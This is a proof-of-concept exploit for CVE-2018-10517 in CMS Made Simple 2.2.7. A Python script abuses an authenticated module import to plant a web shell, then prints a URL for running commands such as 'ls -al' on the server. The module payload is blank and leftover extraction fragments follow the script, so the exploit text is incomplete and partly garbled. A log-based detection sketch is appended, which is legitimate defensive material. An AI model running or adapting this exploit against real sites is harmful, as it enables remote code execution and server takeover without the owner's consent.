# CVE-2018-10517 CMS Made Simple 2.2.7 Remote Code Execution Vulnerability
==POC==

```python
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 2018-11-04
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517

# 1. Description:
# An attacker or a malicious user with access to the administration interface can execute code on the server.

# 2. Proof of Concept:

import requests

# target configuration (required admin credentials in order to obtain a valid session)
target_url = ""
session_cookie = " "
session_value = " "

# upload of shell under the name of Matomo plugin
burp0_url = target_url + "/admin/moduleinterface.php"
burp0_cookies = {session_cookie: session_value}
burp0_headers = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/",
    "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}
# multipart body: mact (module action), __c (token) and m1_upload (test.xml);
# the XML body of test.xml is blank in this copy of the script
burp0_data = (
    "-----------------------------207726338310671742711263591267\r\n"
    "Content-Disposition: form-data; name=\"mact\"\r\n\r\n"
    "ModuleManager,m1_,local_import,0\r\n"
    "-----------------------------207726338310671742711263591267\r\n"
    "Content-Disposition: form-data; name=\"__c\"\r\n\r\n"
    "9a63802b6c4579cc01c\r\n"
    "-----------------------------207726338310671742711263591267\r\n"
    "Content-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\n"
    "Content-Type: text/xml\r\n\r\n"
    " \n \r\n"
    "-----------------------------207726338310671742711263591267--\r\n"
)
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print("Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al")
```

Text left over from the XML upload body (its markup did not survive extraction): the values 1.3, Matomo, 0.0.1 and 2.1.5, followed by these path and flag pairs:

/ 1
/action.admin_settings.php 0
/action.admin_statistics.php 0
/action.default.php 0
/action.savesettings.php 0
/lang/ 1
/lang/en_US.php 0
/Matomo.module.php 0
/moduleinfo.ini 0
/templates/ 1
/templates/adminsettings.tpl 0
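A detection sketch for the request sequence in the PoC above, added here as an example and not part of the original exploit or of CMS Made Simple: it flags a client that POSTs to `/admin/moduleinterface.php` and then requests a PHP file under `/modules/` directly. It assumes combined-format access logs and that module PHP files are not normally fetched directly; the function name, time window and sample log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format), not from a real host.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Nov/2018:10:00:01 +0000] "POST /admin/moduleinterface.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Nov/2018:10:00:09 +0000] "GET /modules/Matomo/action.admin_settings.php?cmd=ls%20-al HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.20 - - [04/Nov/2018:10:05:00 +0000] "POST /admin/moduleinterface.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.20 - - [04/Nov/2018:10:05:30 +0000] "GET /admin/moduleinterface.php?mact=News,m1_,defaultadmin,0 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.44 - - [04/Nov/2018:11:00:00 +0000] "GET /modules/News/action.default.php HTTP/1.1" 200 0 "-" "curl/7.58.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
# Direct request for a PHP file inside a module directory.
MODULE_PHP_RE = re.compile(r'^/modules/(?P<module>[^/]+)/[^?]*\.php(?:\?.*)?$')
ADMIN_ENDPOINT = "/admin/moduleinterface.php"

def find_import_then_direct_hit(log_text, window=timedelta(minutes=10)):
    """Return findings where one client POSTs to the module interface and then
    gets a 200 for a PHP file under /modules/ within `window`."""
    last_admin_post = {}  # client IP -> time of its most recent admin POST
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["uri"].split("?", 1)[0]
        if m["method"] == "POST" and path == ADMIN_ENDPOINT:
            last_admin_post[m["ip"]] = ts
            continue
        hit = MODULE_PHP_RE.match(m["uri"])
        posted = last_admin_post.get(m["ip"])
        if hit and m["status"] == "200" and posted and ts - posted <= window:
            findings.append({"ip": m["ip"], "module": hit["module"], "uri": m["uri"],
                             "seconds_after_post": int((ts - posted).total_seconds())})
    return findings

if __name__ == "__main__":
    for finding in find_import_then_direct_hit(SAMPLE_LOG):
        print(finding)
```

Access logs do not record the POST body, so the `mact` value `ModuleManager,m1_,local_import,0` is not visible here; confirming a module import needs request-body logging or the CMS admin log.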